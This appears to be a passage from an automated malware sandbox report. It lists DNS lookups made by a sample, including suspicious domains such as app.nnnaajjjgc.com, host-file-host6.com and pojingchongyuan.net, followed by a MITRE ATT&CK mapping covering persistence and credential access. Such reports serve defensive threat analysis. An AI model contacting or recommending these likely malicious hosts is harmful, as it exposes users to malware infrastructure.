113 B
1
1

DNS Request

141.179.250.142.in-addr.arpa
8.8.8.8:53

121.72.236.156.in-addr.arpa

dns

73 B
127 B
1
1

DNS Request

121.72.236.156.in-addr.arpa
8.8.8.8:53

195.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

195.179.250.142.in-addr.arpa
8.8.8.8:53

131.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

131.179.250.142.in-addr.arpa
8.8.8.8:53

play.google.com

dns

msedge.exe

61 B
77 B
1
1

DNS Request

play.google.com

DNS Response

142.251.36.14
8.8.8.8:53

147.174.42.23.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

147.174.42.23.in-addr.arpa
224.0.0.251:5353

378 B
6
8.8.8.8:53

19.23.72.62.in-addr.arpa

dns

70 B
129 B
1
1

DNS Request

19.23.72.62.in-addr.arpa
8.8.8.8:53

196.168.217.172.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

196.168.217.172.in-addr.arpa
8.8.8.8:53

142.121.18.2.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

142.121.18.2.in-addr.arpa
8.8.8.8:53

static.xx.fbcdn.net

dns

msedge.exe

65 B
104 B
1
1

DNS Request

static.xx.fbcdn.net

DNS Response

157.240.196.15
8.8.8.8:53

15.196.240.157.in-addr.arpa

dns

73 B
117 B
1
1

DNS Request

15.196.240.157.in-addr.arpa
8.8.8.8:53

app.nnnaajjjgc.com

dns

ss41.exe

128 B
160 B
2
2

DNS Request

app.nnnaajjjgc.com

DNS Request

app.nnnaajjjgc.com

DNS Response

154.221.26.108

DNS Response

154.221.26.108
8.8.8.8:53

22.236.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

22.236.111.52.in-addr.arpa
8.8.8.8:53

108.26.221.154.in-addr.arpa

dns

73 B
134 B
1
1

DNS Request

108.26.221.154.in-addr.arpa
8.8.8.8:53

host-file-host6.com

dns

65 B
138 B
1
1

DNS Request

host-file-host6.com
8.8.8.8:53

host-host-file8.com

dns

65 B
81 B
1
1

DNS Request

host-host-file8.com

DNS Response

194.169.175.127
8.8.8.8:53

127.175.169.194.in-addr.arpa

dns

74 B
135 B
1
1

DNS Request

127.175.169.194.in-addr.arpa
8.8.8.8:53

babd89b9-4f30-405b-ad7b-29c3fe622ec4.uuid.pojingchongyuan.net

dns

csrss.exe

107 B
181 B
1
1

DNS Request

babd89b9-4f30-405b-ad7b-29c3fe622ec4.uuid.pojingchongyuan.net
8.8.8.8:53

server13.pojingchongyuan.net

dns

74 B
90 B
1
1

DNS Request

server13.pojingchongyuan.net

DNS Response

185.82.216.50
8.8.8.8:53

cdn.discordapp.com

dns

64 B
144 B
1
1

DNS Request

cdn.discordapp.com

DNS Response

162.159.135.233

162.159.134.233

162.159.129.233

162.159.130.233

162.159.133.233
8.8.8.8:53

stun1.l.google.com

dns

64 B
80 B
1
1

DNS Request

stun1.l.google.com

DNS Response

142.251.125.127
142.251.125.127:19302

stun1.l.google.com

48 B
60 B
1
1
8.8.8.8:53

acedemon.com

dns

58 B
90 B
1
1

DNS Request

acedemon.com

DNS Response

172.67.183.152

104.21.88.145
8.8.8.8:53

127.125.251.142.in-addr.arpa

dns

74 B
108 B
1
1

DNS Request

127.125.251.142.in-addr.arpa
8.8.8.8:53

233.135.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

233.135.159.162.in-addr.arpa
8.8.8.8:53

50.216.82.185.in-addr.arpa

dns

72 B
95 B
1
1

DNS Request

50.216.82.185.in-addr.arpa
8.8.8.8:53

152.183.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

152.183.67.172.in-addr.arpa
8.8.8.8:53

88.16.208.104.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

88.16.208.104.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Modify Registry

T1112

Scripting

T1064

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery